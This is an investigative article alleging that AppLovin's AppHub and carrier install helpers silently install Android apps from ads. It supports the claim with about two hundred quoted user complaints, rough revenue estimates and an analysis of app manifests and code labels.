It is extraordinarily rare for a company of AppLovin’s size to be caught placing software on users’ devices without their consent. The closest parallel is the 2005 revelation of Sony installing DRM software onto users’ computers without notice, without a EULA, and even when users pressed Cancel. That misconduct triggered enforcement by multiple state attorneys general, private lawsuits, seven-figure settlements, recall of affected CDs, and lasting reputational damage for Sony.
A similar trajectory is plausible for AppLovin. If others come to share my view that AppLovin installed apps without user permission, the company will be a pariah in online advertising. Trust in AppLovin’s auctions, privacy practices, and overall integrity would collapse. Some advertisers currently pay AppLovin both to sell them ad placements and to measure the effectiveness of those ads—which would suddenly seem ill-advised. Allegations in investors’ spring 2025 critiques—previously dismissed as speculation—would become more credible. If critics were right about AppLovin’s install practices, allegations about misbehavior in ad targeting, bid handling, and auction integrity are plausible too.
Google may also react strongly. AppLovin’s tactics circumvent Android security and Play Store protections—similar to other abuses Google previously punished (e.g. its 2018 removal of Cheetah Mobile apps). Google could respond by disabling or removing apps that connect to AppHub, by disabling or removing apps that were installed by AppHub, or by alerting users. Imagine a pop-up: “Your carrier preloaded your device with an install helper that lets third parties install apps without your consent. Google has detected 7 such apps on your device. Would you like to disable the helper and remove those apps?” The impact on AppLovin would be severe. In fact user complaints specifically ask Google to take action: “I believe this is illegal and am going to report it to Google as well.” (Rachel H), “This is nefarious and should be deplatformed by Google” (Colleen Ember), “Google needs to know about this” (Johnson David), “This should be banned from the Google Play store!” (Philip Mecham). With AppLovin intruding onto users’ devices—not “just” draining advertisers’ budgets—there is a strong case for Google to act.
Reading a draft of this article, some people asked about the revenue and profit implications. Rough calculations say the numbers are material:
Android holds >70% global market share, but high-value users skew toward iPhone. Suppose Android accounts for ~40% of value-weighted usage.
Of Android devices, AppLovin’s manufacturer and carrier deals may cover ~40%, giving ~16% of devices where installs could occur without consent.
AppLovin claims an audience >1 billion devices. If AppLovin placed just two unwanted apps on each device each year, that would be ~300 million installs per year.
At $1 per install (a fraction of AppLovin’s estimated average), that’s $300 million of revenue annually. With no payment to carriers, manufactures, or source apps, this revenue drops straight to the bottom line, yielding about 20% of AppLovin’s 2024 net profit.
The true impact could be larger. Legal fees, settlements, and regulatory penalties will weigh on earnings. Distrust among advertisers and partners could impede future business. Device manufacturers and carriers may have been prepared to look the other way, but are unlikely to let AppLovin continue once these problems come to the fore. And if Google disables AppHub or warns users, AppLovin risks losing not just future revenue but also its installed base.
I gathered 208 distinct complaints centered around the same problem: while a user played one game, another game was installed without consent. Representative examples:
“Instead of giving people the option to download the games when tapping on advertisements, the games automatically download to the device when the ads are tapped.” (PanPizz, October 31, 2023, emphasis added)
“I was watching ads on the webtoons app and it seems that rather than prompting a download through the play store. The advertisements for wordscape and tower war are basically auto downloading themselves to my phone. (Merlin2v, January 23, 2024, emphasis added)
“whenever I get an advertisement on IbisPaint, that app automatically downloads onto my phone” (BlackberriedGoat, September 4, 2023, emphasis added)
“you click anywhere and it automatically installs, doesn’t go through Google Play” (Punkminkis, January 5, 2024, emphasis added)
“I accidentally click on an ad when trying to click the x or skip button and the next thing I know I’m getting a notification that says tap to launch game.” (Disastrous-Jury4328, January 16, 2024, emphasis added)
“Multiple times after watching an ad in Hero wars: Alliance I’ve found a new game installed on my phone when I DID NOT touch anything to download and install.” (GreggAlan, March 16, 2024, emphasis added)
“Accidentally touch the screen during ad play and the game being advertised will be automatically installed without your consent.” (Lukas Landing, December 19, 2023, emphasis added)
“Optional ads also install other games WITHOUT PERMISSION. I’ve had to uninstall spam games over and over.” (Graham Curnew, August 9, 2024, emphasis added)
“Three times now I’ve gotten that ad for Tower War and any 30 seconds after the ad is over I get a push notification that Tower War has finished installing and is ready to play.” (JetJaguardYouthClub, August 24, 2023, emphasis added)
Some complaints specifically attribute unwanted installations to AppLovin or AppHub:
“It somehow installed apps from AppHub. How do I access AppHub to remove unwanted apps?” (Pomonian, May 25, 2025)
“Partnered with AppLovin, which if you misclick on their ads it automatically installs the game for you unless you notice and manually stop it” (Doom Clasher, July 3, 2024)
“Try deleting the app “apphub” … I noticed a notification saying it automatically downloaded apps” (Fadelsart, December 23, 2023)
Others users attribute the installs to install helpers such as Content Manager, Device Manager, or AppSelector that device manufacturers and carriers allow AppLovin to use for installs. (Details from code analysis.) It is logical that users attribute the installations to install helpers. For one, Android notifications routinely announce that an app has been installed, and give the name of the responsible install helper. Two, if a user checks Android Settings > Apps, the section “App details” will reference the name of the install helper. Three, the app that triggers the install helper is present neither in the notification nor in Settings > Apps > … > App details, making it less likely that users will reference AppHub except on those devices where AppHub itself has installation permissions and does not use a separate install helper.
Credibility of user complaints
The user complaints are credible based on both consistency and level of detail. A few users might be mistaken—for example, by tapping “install” and later forgetting. But the volume and similarity of complaints, from hundreds of independent users, reveals a broader pattern.
More than merely discuss unwanted installations, many of the complaints give details consistent with my code analysis. For example, users overwhelmingly report that installations occur when they receive ads (see the top bulleted list above), which exactly matches what my code analysis indicates.
Some complaints address alternative explanations such as a user accidentally approving an installation. Complaints deny that with specific details that make their denials credible:
“Happened to me with royal match. I clicked the x. Yet it downloaded the game. Yes I would know if I clicked install or not.” (Sunfish1988, February 13, 2024, emphasis added)
“I sorted thru my apps shortly before downloading Wordscapes last month, so I know I had no unwanted games on my phone at that time. Since then I’ve deleted 4 new games that I did not consent to download or even realize were downloaded.” (Jadiegirl, January 24, 2024, emphasis added)
“I noticed that whenever the game had a trial and I touched the screen it would slash to the screen that looked like Google Play and the Install Button would have the word “Cancel” on it as though I’d initiated the download (which I didn’t).” (Thotiana777, April 25, 2024, emphasis added)
“the ads for other games are very predatory and self install without permission if you miss the ‘x’ to close them by a milimeter” (Thin Richard, April 23, 2025, emphasis added)
Complaint with screenshot attributing installations to AppHub
A few complaints are include screenshots showing the problem. For example, Reddit user Guilty_Astronaut5344 preserved a post-install notification attributing three unwanted installs to AppHub.
Complaints reporting countdown timer, and showing the countdown in video and screenshot
Other complaints are particularly credible because they match even more specific details from the AppLovin code. For example, three users reported countdowns leading to automatic install:
“Just today I’ve seen them implement a 5-second “countdown” to the program installing the game, but stopping the countdown STILL INSTALLS THE GAME WITHOUT YOUR CONSENT.” (PanPizz, October 31, 2023)
“I’ve come across some really shitty ad tactics that will auto install the app they’re pushing if you click anywhere on the screen before the timeout. Even if you just back out, if you don’t actually hit cancel install then you’ll get some stupid questionable games installed …” (dontthink19, January 7, 2024)
“Mobile game ads can now just install themselves without you tapping Install, wish is now replaced by ‘Install now’ if you want the game 5 seconds sooner. Hitting the X instead of Cancel still installs the game” (nascarsteve, December 10, 2023)
Not only does the general concept of a countdown-to-install match what I found in AppLovin code, the first and third comments also mention the duration of the countdown, from 5 seconds. This matches the “AutoInstallDelay” default countdown duration listed in AppLovin code. (The code sets a duration of 5e3, meaning 5×103=5000 milliseconds, matching the complaints.) Remarkably, user dontthink19 faced the countdown-to-install ads often enough, and predictably enough, that he was able to capture one such installation on video – showing an ad, then the countdown to install, then the app installed, then him uninstalling it, all in a single continuous video file. Key screenshots from dontthink19’s video:
0:03 Start of advertisement promoting Weapon Master0:19 Conclusion of advertisement promoting Weapon Master0:20 “X Install Screen” for Weapon Master, which opened automatically, and says it will “Install in 5s”0:31 Confirmation of Weapon Master installed. Small text at center reads “Weapon Master” “Tap now here to launch!”0:39 Weapon Master is indeed installed, albeit available for uninstall
The countdown videos and screenshots also match yet other details from AppLovin code. In the countdown-to-install screen, notice the unusual label “Install in 5s” (using the abbreviation “s” for seconds, with no space between the number and the letter s). This exactly matches the pattern in AppLovin code I found—further confirming that AppLovin is responsible for this installation.
Complaints about installation upon clicking x
Numerous users report that clicking an x, or trying to click an x, nonetheless causes an app to install. Combining source code and user complaints, two types of complaints are at risk of being combined:
Users who received what I call the X Install Screen (step 3 in the Weapon Master sequence above), and who tapped the X in that screen (which is an installation pathway in the IsOneClickInstallOnCloseEnabled JavaScript logic).
“Mobile game ads can now just install themselves without you tapping Install, wish is now replaced by ‘Install now’ if you want the game 5 seconds sooner. Hitting the X instead of Cancel still installs the game” (nascarstevebob – December 10, 2023, emphasis added)
“Even if you just back out, if you don’t actually hit cancel install then you’ll get some stupid questionable games installed …” (dontthink19, January 7, 2024, emphasis added)
“It definitely auto-installs. I’ve tested it because I was wondering where tf all these random shitty game apps were coming from in my phone. I don’t click anything, and if you don’t select “cancel” when it starts installing, the game will install. If you try to exit out, it does not count and will still install the game.” ([deleted] – January 22, 2024, emphasis added)
Many others, such as the following, could be either type 1 or type 2 above—but either way, indicate users’ dissatisfaction at installations occurring when users try to exit and decline.
“There are now ads that autoinstall other apps on your phone! They look like interactive/minigame ads, but touching ANYTHING – the close button, trying to pull up the phone navigation bar to exit WS – will trigger these apps to start installing.” (Star Donovan – February 2, 2024 on Google Play, emphasis added)
“the straw that broke the camel’s back was how exiting the ads forces you to download them. I’ve deleted 5 apps I did mot want to download.” (Casey Kristin Frye – December 23, 2023 on Google Play, emphasis added)
“They run adds on other games, you click to close out the automatic install, surprise you’ve downloaded the game for the 59th time!” (Luke Williams – September 17, 2024 on Google Play, emphasis added)
“Game installed itself by me trying to exit an add on another game” (Ian Kelley – June 23, 2024 on Google Play, emphasis added)
“It installed itself into my phone when I tried to exit an app that was showing an ad for this. This is super shady on their part and should be looked into” (Parker Abegg – December 14, 2023 on Google Play, emphasis added)
Scores of similar complaints
The following list presents 208 relevant complaints from Play Store, Reddit, and other online discussions. Some complaints are excerpted to the relevant section, but spelling and punctuation are unchanged.
I had this problem too and managed to Google some suggestions that seem to have prevented this from happening again. I don’t recall the instructions exactly but the short version is that my phone manufacturer (in my case, Motorola) had some pre-installed app(s) that allow auto installation from ads. I couldn’t uninstall the apps but I disabled all the suspicious ones/likely suspects based on my Google-fu, and that seems to have done the trick.
I was playing a game when an ad popped up and it showed one of those scam “free” money ads and it somehow installed itself without me pressing anything. I didnt accidentally click on the ad or anything, it just automatically installed when the ad started playing.
I’ve had that happen and I’m sure I didn’t install it by mistake. I checked the app that installed the adware and it was my Telco provider app that installed the ads, and they installed all at the same time, it’s annoying as shit.
I was having the similar problem with ads showing Klondike Farm Adventures. Without even touching the screen it would automatically download and it was downloading not through Google Play Store but through Samsung game store.
This game (or its ads) can illegally download and install games onto your device without your consent or knowledge. These games (all from different developers) suddenly appear on my phone on the very last screen. They’re nothing I’d ever play. I’ve never even heard of “Tiledom” or “2248 Numbers Merge,” by Funvent Studios or Play Simple Games. This is the 3rd time this game has done this. I don’t know how, but I’m sure it’s this game.
Recent update just pumped it onto my phone and without me allowing it, it’s going through and installing dozens of pos mobile games. It’s invisible to the user and cannot be disabled or uninstalled.
Ads pop up and install games without being prompted. Pop up ads are frustrating. They open without being clicked and navigate away from the game. Sometimes installing new games without being prompted…very frustrating
My phone just started installing random apps to my secure folder. It is called ‘AppHub’ but I can not see the any app called ‘AppHub’ both main stetting -> App and secure folder setting app. Do anyone facing the same problem? I m sure these app were malicious and asked the root permission :/
My phone just started installing random apps to my secure folder. It is called ‘AppHub’ but I can not see the any app called ‘AppHub’ both main setting -> App and secure folder setting app.
It installs other apps from the ads it shows you. AUTOMATICALLY WITHOUT MY PERMISSION!
Note: Game developer did not deny forced installations: “Hey! We’re not huge fans of ads either, but we can’t keep our game free without them. They help us develop new features, maintain the app, and release updates. We’d love it if you changed your mind. Come back soon!”
Wrong. It definitely auto-installs. The little “X” pops up, but when you click it – you just clicked on the ad (NOT an “install” button) and it installs. I’ve just now had to uninstall two crappy games from my phone, Merge Mansion and some other crap. This is infuriating and should not be legal as it is bypassing my security settings and installing things without my permission.
Your ads are auto installing apps in the background… You stopped it for a while now it started again. This needs to stop!!! update, ads are getting worse.. false X seem to be the standard..
BEWARE OF OTHER APPS BEING INSTALLED WITHOUT YOUR PERMISSION… written by people who use full screen ads to install various other apps [MOB CONTROL game app] ****** when you try to click the [x] button to close the pop up ad it vanishes (w/ split second timing) and is replaced by an OK button
i keep getting ads for this game with a fake x. When i click the x, it automatically installs this game without my permission. I’ve had to uninstal it 5 times now
Caution: this game’s ads will automatically download games without your permission. It did this to me with 4 apps that played as ads. I had to manually go in and uninstall.
somehow the games in the ads install themselves. When I try to click on “x” to close the add, it connects to a website or play store and even before I can close them, voila, those games are installed on your phone. Be very careful!!
Partnered with AppLovin, which if you misclick on their ads it automatically installs the game for you unless you notice and manually stop it, inflating their download count. I did not knowingly download this “game.” I did not click “install.” How is this even legal?
Careful with this game. If you even try to stop an ad between gameplay, it will automatically install other games on your phone without asking. I had about a dozen games in my phone without even realizing it. I uninstalled those as well as this game. Never again.
I get this a lot. If I don’t click anything, the app installs itself on my phone. If I click the ‘x’, the app auto installs on my phone. The only way I can make it stop is to press the cancel button.
this application have so much control on device that it automatically installs other games on device without permission. This is sheer violation of privacy and recommended not to be installed.
Help! Device Manager is auto-iinstalling apps from ads. Some games from google play have ads that auto download applications. I traced it back toT-Mobile’s Device Manager allowing malicious ads to auto install applications. That’s right, just watching the ad downloads an app. T-mobile has made it impossible to disable this app. I am fearful of this massive security hole. I am scared of malicious apps being downloaded. I have seen other complaints over the last few months. What can I do fix this major security hole? … All I know is that the malware ads come from something called applovin. … It is just too much of a security risk that that T-Mobile has created with their Device Manager allowing allowing 3rd parties to automatically download and install of potential malware.
Then I noticed that whenever the game had a trial and I touched the screen it would slash to the screen that looked like Google Play and the Install Button would have the word “Cancel” on it as though I’d initiated the download (which I didn’t). When I tried to hit cancel it would go back to the trial play thing and back and forth until I just X’ed out of it.
They utilize ads in other games to AUTOMATICALLY INSTALL this trash on your phone. Absolute slimiest tactic to get me to play your garbage game I’ve ever seen.
If you accidentally touch an ad, it automatically installs an app on your phone.
Note: Game developer did not deny forced installations: “Thank you for reporting this problem with our tower war tactical game. We will try to fix it as soon as possible so that you can continue to enjoy it.”
I can’t leave reviews of the apps that are auto download in fact when I look at app info they say the apps are downloaded by device manager and not google play.
I found an app called Content Manager on my Samsung S24 that I bought through T-Mobile. There was an option there that says “Allow Install of New Apps” and I turned it off, and the ad installs stopped. I think it’s seriously f-ed up that things like this are allowed.
I accidentally downloaded this just by clicking on an AD. JUST BY CLICKING ON IT. Not to be confused with accidentally pressing the download button on the AD. These advertisements are getting scummier and shadier by the day. What’s next? Are you going to turn wordscapes into a self reinstalling virus? We live in the lamest dystopia possible.
I watched an ad for Wordscapes for a different game I play and they INSTALLED this app WITHOUT my PERMISSION!! I didn’t click on anything and even if I accidentally did (I didn’t), Wordscapes doesn’t have the right to download their app onto my phone without my permission!!! I believe this is illegal and am going to report it to Google as well. **I deleted it when I saw it was downloaded onto my phone, but had to reinstall it to make this review**
Multiple times after watching an ad in Hero wars: Alliance I’ve found a new game installed on my phone when I DID NOT touch anything to download and install.
It’s been happening to me constantly and I’m so tired of it. Can’t figure out how to kill that function or at least make the damn thing wait for a prompt so I can say no. I’m on a Samsung Android with all of my security settings as recommended (apps only from Play or Samsung Store, ask permission before downloading or updating apps on any network, etc.). I’ve filed a few customer support requests with Snowprint, who have always been helpful and offer apologies but don’t seem to have solved the issue. Block Blast, Merge Mansion, Overmortal, Wordscapes… The list goes on.
It’s not coool, nor should it be legal for your ads to automatically install games on my phone.
Note: Game developer did not deny forced installations: “Thank you for reporting this problem with our tower war tactical game. We will try to fix it as soon as possible so that you can continue to enjoy it.”
I freaking hate this BS. I have searched every setting possible and can not figure out how to turn it off or prevent it. I have noticed that it only does it through Galaxy Store. Not Play. If anyone has figured out how to stop it, lmk.
An ad played for this game and without any input on my end, INSTALLED ITSELF ON MY PHONE. This is ridiculous how dare you install your product on my phone without my permission. The ad played. I did not touch it didn’t even touch my phone screen and still it’s on my phone. This is neither legal nor ethical and it is extremely concerning as to what this game is. If this happens again I will be seeking legal action against your company. Absolutely ridiculous.
I get this app as an ad, and when I try to close the ad and I fail, it doesn’t just take me to the play store to download it, it actually force installs on my phone without me giving permission to download app or install. I don’t like the fact this app is force installing on my phone from ads and not from the play store. I would give this game a try if it didn’t force me to install it and actually gave me a choice instead. Absolutely unacceptable, acting like a virus rather than an app.
One of many games that have taken the ad program where it will install itself on your device when you close the ad. If it weren’t for that it would be a good game. But just auto installing itself on your device is something that defines what a Virus is.
This ap has installed itself without my permission after seeing an ad in another game. This is nefarious and should be deplatformed by Google for this behavior.
Installed without my consent. It was installed during an ad from another app with no way to cancel or even see it installing. I didn’t even notice until my phone said, “Moving to game hub.” If their ads install the app without consent, what else will this completely untrustworthy company will install while app is installed? No thank you.
YES. I sorted thru my apps shortly before downloading Wordscapes last month, so I know I had no unwanted games on my phone at that time. Since then I’ve deleted 4 new games that I did not consent to download or even realize were downloaded. Very sketchy. I’ll be watching my apps closely from now on. I obviously like Wordscapes, but if this continues to happen, I’ll probably delete it.
Disappointed has started those auto install adds where it starts installing and you have to cancel and ended up with 2 unwanted games so just Uninstalled this app after playing for a long time.
Hello, so I was watching ads on the webtoons app and it seems that rather than prompting a download through the play store. The advertisements for wordscape and tower war are basically auto downloading themselves to my phone. When I checked to see what store installed it, it says it was installed by Device manager.
Does anyone else seem to have apps downloaded to their device after playing Wordscapes? I seem to have some of the apps on my phone now that appear in the ads, but did not download them.
It happens to me on the mobile games I play. I accidentally click on an ad when trying to click the x or skip button and the next thing I know I’m getting a notification that says tap to launch game. I get it so many times with fishdom and I just got it with tile match.
WARNING THIS APP IS MALWARE IT AUTO-INSTALLED ON MY DEVICE THEY USE A SPECIFIC AD THAT AUTO-INSTALLS ON YOUR DEVICE IT IS NOT AN ACCIDENT AVOID THIS APP
I’ve come across some really shitty ad tactics that will auto install the app they’re pushing if you click anywhere on the screen before the timeout. Even if you just back out, if you don’t actually hit cancel install then you’ll get some stupid questionable games installed … It’s happened to me 3 times now. I’m looking for new games to play and when ads are served in that manner, I’ve had to go back and uninstall them. They don’t magically install themselves. You misclick on the ad and it opens up to a timer you have to cancel or it’ll get installed
Note: With video at https://imgur.com/a/YzXCWzV showing 5-second countdown followed by auto-install. Countdown narrative and 5 second threshold match AutoInstallDelay in code.
Game is decent. However, last night one of the adds turned out to be self installing malware. It took me 20 mins to remove the malware and everything it installed.
I’ve seen the ads OP is talking about. It’s got a quick download or something, you click anywhere and it automatically installs, doesn’t go through Google Play.
One of your ads was installing this game without my permission, and when it was done, it booted up in front of my phone game. Stop doing this. This is outrightfully idiotic.
Ads that download an app on to my device if I click anywhere are offensive and dangerous. Having 30+ second, phased, unskippable ads, that download apps on to my device is downright insulting.
Wordscapes currently has an AD going around on other apps that will FORCE INSTALL THE GAME DURING THE AD AND IT CANNOT BE CANCELLED. These predatory ADs were found in a game called Water Sort. Wordscapes forced installed their app on my device without permission multiple times and they should be FINED.
I was playing another game and this ad showed up i tried to click the x it took me to the download and started it automatically I then hit cancel thinking nothing of it then later check my phone and it was installed against my consent
I’ve had this happen to me with the tower war playable ad about a dozen times. They updated their ad a couple weeks ago and it stopped, but a couple days ago they changed the ad back and it is happening again.
Installed itself. While playing a different game, I got an ad for this game and thought I closed it. A couple minutes later I got a notification that it was done installing.
I got an ad for it and then a long lasting black screen with an install button. The x mark is so small that you are likely to miss it. Turns out the WHOLE SCREEN is an install button and it automatically installs, even if you hit cancel. Very shady.
Try deleting the app “apphub” (i had to search it in the settings of the phone to actually find the app) I noticed a notification saying it automatically downloaded apps (this was a notification from the phone itself on the day of purchase) and saw this “apphub” app that says it “provides a friction free download service for in-game ad choices” and it immediately set off a red flag for this issue we’ve been having. So far it seems to have worked but I will update if it happens again. The worst part about it is that I have parental controls set up on my child’s phone and it was bypassing them to auto-download these ads despite my approval being necessary to download anything.
DONT HAVE YOUR GARBAGE “GAME” 1-TAP INSTALL WHEN ALL I’M TRYING TO DO IS X PAST YOUR AD. I DONT WANT YOUR GARBAGE, STOP INSTALLING YOUR TRASH ON MY PHONE.
This thing keeps getting installed on my phone without my knowledge. I have to uninstall it regularly. It’s got ads on my other apps and somehow gets installed by itself! Google needs to know about this.
He’s right, I’ve had three games auto install. It happens on the ads that play extra long credits. Typically, you won’t be awarded for the completion of the add and another add will play. This literally happened to me today for the third time.
Yeah this is a thing I’ve been having happen recently. The apps install themselves. Even if you don’t click the X to end the ad, the still install themselves. … they fully go and install themselves at the end of the video. It’ll show the download bar at the top and the app will be with all the other apps.
Mobile game ads can now just install themselves without you tapping Install, wish is now replaced by ‘Install now’ if you want the game 5 seconds sooner. Hitting the X instead of Cancel still installs the game
I’ve had idk how many game ads lately send me to the app store when I tried closing them. In fact, I KNOW I didn’t download anything, and recently found 2 apps on my phone that had gotten downloaded. Had to have happened in the past couple days. Never opened them, promptly deleted them. Just annoyances. Especially when they’re things I’d NEVER use like insta or tiktok.
Instead of giving people the option to download the games when tapping on advertisements, the games automatically download to the device when the ads are tapped. No consent is given to the users when it comes to when they want to download the games or not, as soon as you tap on the ad it downloads for you. … AppLovin are now essentially baiting you with a demo and then forcing the full game down your throats. Just today I’ve seen them implement a 5-second “countdown” to the program installing the game, but stopping the countdown STILL INSTALLS THE GAME WITHOUT YOUR CONSENT. …
Security threat! Automatically installs from ads without permission or consent, then starts sending push notifications. uninxstalled immediately without launching. No means no!
Game was good and fun for a while until I noticed that if you clicked the ad accidentally, you run the risk of having some of the apps automatically installed. Ended up with 2 games that I did not want on my phone. BS practice.
Why does the game download apps whenever I watch an ad?” “This only started to happen recently. I would have my phone on the side and watch the dragon TV ads and whenever I was done, there would be an app installed.
this stupid game keeps getting automatically installed by ads in other games. I do not want to play this game and your disgusting tactics of forcing a download that I DO NOT WANT ON MY PHONE border on criminal.
An ad for this app keeps popping up on my phone. When I try to close it, the app installs. Please do something about this glitch. No that doesn’t help. If I don’t want an app and I’m trying to close an ad, I would expect that it not automatically download on my phone regardless.
This app keeps installing itself every time I watch an ad for it. Even if I do not touch my screen at all throughout the whole ad, it still installs itself after playing. I’ve deleted this app both too many and not enough times. I will continue deleting it.
I will never use this app. The developers push deceptive ads in other applications that automatically install Wordscapes on your phone when you try to close the ad. This is deceptive behavior and I’ve reported this to the Play store.
Ad automatically installed an app? … So it’s as the title says. I played an ad in the game, and it automatically installed an app (It was bricks and balls) I never left the AR app and I only realized it happened because I got a notification that said “click to launch the bricks and balls app. … So I went and checked and…yep it had been installed.
Ad for this game appeared and while trying to x out of it, accidentally clicked the ad. A minute later i receive a notification that Wordscapes installed. Never clicked on an install button. Shady practices.
This game literally installed itself while I was trying to make an ad go away in Brotato. No redirect to the play store. No confirmation on the install. you miss the x on the corner and now you have a new game installed that you never asked for. absolute scumbag design. 0 out of 10.
Game itself is fun, you ruin it with ads for apps that auto install on your device. I can deal with ads you can close but not ones that install themselves and you have to close your game to go uninstall the unwanted app.
The problem that I am seeing now is that when you encounter an ad, it automatically installs the game listed in the ad. This is happening every time I play the game. I am ready to delete the game at this point. The frustration of having to uninxstall the latest game you force download is too much.
Disabled on both our phones the day we got home with them. But woke up a few days ago with screen like OP posted (both phones). Somehow the app selector got turned back on without our knowledge.
You can disable AppSelector and you’ll never see those again (at least I’ve been through a few updates now and I haven’t seen it). I always recommend people uninstall or disable AppHub and AppSelector. One of those apps will also just straight up install apps on your behalf without your knowledge, so if you don’t get rid of those two apps and you see random apps mysteriously appear, that’s why. They’re T-Mobile malware that gets preinstalled on carrier versions of android devices that T-Mobile sells. AT&T and Verizon do the same thing unfortunately.
Hello, for the past two or three days, whenever I get an advertisement on IbisPaint, that app automatically downloads onto my phone. Does anyone have this issue / know how to fix this?
Three times now I’ve gotten that ad for Tower War and any 30 seconds after the ad is over I get a push notification that Tower War has finished installing and is ready to play. Sure enough, there’s the game, loaded onto my phone without my permission. The only thing I clicked on was the “x” to close the ad once it was done. Kinda creeps me out that an ad can bypass the store and just install unwanted crap on your phone
several Game ads will auto-install the games, no input or knowledge of it happening from you, you simply have several new “games” in you menu. Spyware/virus/predatory behavior.
Nope, T-Mobile does for a fact install it automatically as does every other carrier with their own version. I set up my own S23 Ultra. I’m always very careful with every prompt that pops up, I read it carefully, uncheck anything opting me into spying or other malware features, etc. Yet after setup I was finding random apps being installed on my device and the App Hub, AppSelector, and AppManager were all culprits that I did NOT opt in to.
HATE THE AUTO INSTALL ADS! YOU DO NOT HAVE PERMISSION TO INSTALL APPS ON MY PHONE! AS I TRY TO CLOSE THE ADS, IT WILL AUTO INSTALL APPS TO MY PHONE. GET RID OF THOSE ADS!
Every time an ad plays for this game, while I’m playing a game that I enjoy, it is automatically installed on my device. If this continues, I am willing to start a class action lawsuit. It isn’t legal to use these practices, and I consider it harassment
This ad if accidentally clicked doesn’t even take you to the store to ask if you wanted to download. It just installs. That’s crazy invasive to your device, like a bug. Or a parasite. Once again, marketing work being done by ignorant sales kids who don’t understand law.
Fun game but ads are extremely intrusive. If you try to exit the ad, other games are autoinstalled which can open your device to viruses or other bad actors.
They use other apps to install RM without permission to boost their numbers. I now uninstalled this app at least 7 times – all ads from other apps that unethically installed without permission.
There are now ads that autoinstall other apps on your phone! They look like interactive/minigame ads, but touching ANYTHING – the close button, trying to pull up the phone navigation bar to exit WS – will trigger these apps to start installing. Sometimes you can cancel w/i 1 second, other times there is no cancel so you have to remove these malicious installations later.
I did not choose to install this on my device. The mobile ad for this would not allow me to exit and then this installed without my permission. I understand advertising is important but do not trust an app this invasive.
It definitely auto-installs. I’ve tested it because I was wondering where tf all these random shitty game apps were coming from in my phone. I don’t click anything, and if you don’t select “cancel” when it starts installing, the game will install. If you try to exit out, it does not count and will still install the game.
Ads, I understand. I draw the line at forced installations. I had this app for so long and it was one of the more peaceful ones. They sadly introduced ads, which is annoying but understandable. Now the ads have gotten so intrusive I get more ads than game time. However the straw that broke the camel’s back was how exiting the ads forces you to download them. I’ve deleted 5 apps I did mot want to download.
Note: Game developer did not deny forced installations: “Our team hears you and we’re working to improve the ad experience for you. For now, you may consider getting the premium version to enjoy an ad-free version of the game.”
It installed itself into my phone when I tried to exit an app that was showing an ad for this. This is super shady on their part and should be looked into
Had an advertisment of wordscapes and after it finished it installed itself when I was trying to exit the advertisment. Very sketchy that it installed itself this way
Everytime one of their Royal Match advertisements come up while I’m playing a different game, it force-installs Royal Match game app on my Samsung phone without my consent! I don’t know how to block it from installing! Negative 5 stars! This should be banned from the Google Play store!
Royal Match keeps downloading itself to my phone – without my permission. I play Uno and they have ads for it. And for the past week, it has been automatically downloading itself to my phone.
Keeps installing on my phone every time I see an ad for it. I’ve never wanted this game and I’ve never played it. Just sick as hell of deleting it from my phone.
DO NOT INSTALL- Lately it has become difficult to exit out of the ads, which I had no problems with before. The issue now is that when I exit the ads, it begins to install the app for those ads immediately instead of simply bringing up the playstore where I have the OPTION to install. Frankly these ads that automatically download different apps make me feel that this game is UNSAFE to continue playing. What a dissapointment. This isn’t a fluke either as many friends of mine faced the same issue.
Somehow ended up on my phone,so I thought I’d leave a little insight as to how predatory the way-too-long ads are for this game. I believe it installed itself after a misclick on the ‘X’ to close the ad. A bit scary.
Culper 1 also presents correlation between AppLovin deals with OEMs and carriers in certain regions, spikes in installs in these regions, and spikes in user complaints. The most natural explanation is that the OEM and carrier relationships made it possible for AppLovin to install numerous apps onto users’ phones in affected regions – causing both a spike in installations, and a spike in user complaints. Notably the OEM and carrier deals pertained to Android only, not iPhone, and the installation spike similarly appeared for Android only.
Ordinarily, if app A wants to install app B, it must send the user to Google Play—where installation only proceeds if the user taps the prominent green Install button. At Google Play, accidental installs are rare, and nonconsensual installs are effectively unheard of.
If installations occur outside Google Play, the first question is technical feasibility. It is not enough that source code appears to support this behavior (as shown in my execution path analysis); the Android security model must also allow it. A close review of security settings in the relevant manifests shows that such installs are indeed possible—and in fact, the unusual settings documented on this page are difficult to explain any other way.
Save The Girl manifest indicates authorization to invoke AppHub
The Android game “Save The Girl” includes the following entry in its manifest:
Ordinarily, apps do not need this line to receive ads from AppLovin. So why does this game—and dozens of others—request permission to invoke AppHub? What legitimate purpose does this serve?
AppHub manifest indicates authorization to invoke T-Mobile packages with elevated permissions
The AppHub manifest includes permission to interact with a T-mobile installer helper:
One plausible explanation is that AppHub uses a T-Mobile install helper to complete out-of-box (OOBE) installations. But that only raises a further question: Why would third-party games need to connect to the same privileged middleware?
Com.tmobile.dm.cm has elevated permissions including installing other apps
The com.tmobile.dm.cm package has the critical permission necessary to install other apps.
Some AppLovin APKs seek permission to install apps themselves, without a manufacturer/carrier install helper
In some cases, AppHub does not rely on a manufacturer or carrier install helper. Certain AppLovin APKs instead request install permissions directly. For example, the Adapt v3.40.2 manifest includes:
AppLovin’s public statements are consistent with AppLovin sometimes receiving this permission. From AppLovin’s Array Terms:
To provide the Array Services to you, we may need access to the “INSTALL_PACKAGES” and “QUERY_ALL_PACKAGES” Android device permissions. We receive these permissions through your carrier or mobile phone original equipment manufacturer, and we use them to provide you with the Array Services, including presenting Direct Download screen to you and facilitating the on-device installation of mobile applications at your election (where Array acts as the technical installer, not your carrier).
This paragraph — including phone manufacturer or carrier preinstalling AppLovin code and presetting these permissions — matches what I observed. Of course the “at your election” claim is contrary to my analysis of the execution path, and my tabulation of user complaints, indicating nonconsensual installations.
Flipping through AppLovin APKs, it is easy to find labels and strings that appear to indicate nonconsensual installations. Examples are below.
These labels must be interpreted with care. Ultimately these are labels, not directly indicating actual application functionality. Anyone could name a function FlyToMoon(), but that doesn’t mean he has a rocket or a launchpad.
Furthermore, there could be proper reasons for certain silent installs. Consider the out-of-box experience, when it is routine for manufacturers and carriers to place apps on a user’s device. Consider installations in which user consent is obtained in some earlier part of the process.
Overall, I consider the execution path a more reliable method of determining what AppLovin’s code does. On the other hand, the execution path is complicated—requiring parsing thousands of lines of code to follow the flow, and requiring substantial technical skills to understand the code. In contrast, reviewing strings can be as easy as Edit-Find and dictionary meaning.
Labels and strings in Java code
AppLovin’s code includes various labels that indicate or reference nonconsensual installations. A representative example: com.applovin.array.apphub.tmobile includes a class called TmobileSilentInstallManager. The literal meaning of a “silent install” is one without user consent.
